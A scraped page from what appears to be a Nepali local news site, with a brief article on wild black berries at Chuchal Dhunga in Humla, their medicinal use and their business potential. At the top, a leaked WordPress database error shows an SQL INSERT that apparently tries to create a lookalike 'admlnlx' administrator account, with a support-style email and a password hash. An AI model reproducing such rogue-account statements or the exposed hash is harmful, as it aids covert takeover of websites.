WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BxjnakjOoHUTPnJj1CkFQHJEV8yiq00', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 21:31:38', '', 'admlnlx', 'admlnlx')

चुचल ढुंगाको कालो ऐंसेलु – Gaule Khabar

चुचल ढुंगाको कालो ऐंसेलु

चुचल ढुंगाको कालो ऐंसेलु

कचहरी डट कम, हुम्ला ।।

हुम्लाको मिमी गाविसको एक उर्बर ठाउँ हो चुचल ढुंगा, यहाँ वर्षा समयको तीन  महिनासम्म वनमा हुने कालो ऐँसेलु अर्थात् ब्ल्याक बेरी धेरै हुन्छ । यहाँको ऐँसेलुले दार्मा क्षेत्रका नाम कमाएको छ ।

यदी यसलाई संकलन, बजारीकरण तथा प्रशोधन गर्न सकेमा एक राम्रो व्यवसाय र आम्दानीको माध्यम बन्ने सक्ने कुरामा कसैको ध्यान जान सकेको छैन । हुम्लामा कालो ऐँसेलुलाई विभिन्न रोगहरुको औषधीको रुपमा प्रयोग गर्ने गरिन्छ । तपाईहरु पनि एक पटक यहाँको कालो ऐँसेलु खान जानुहुन्छ कि ?

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका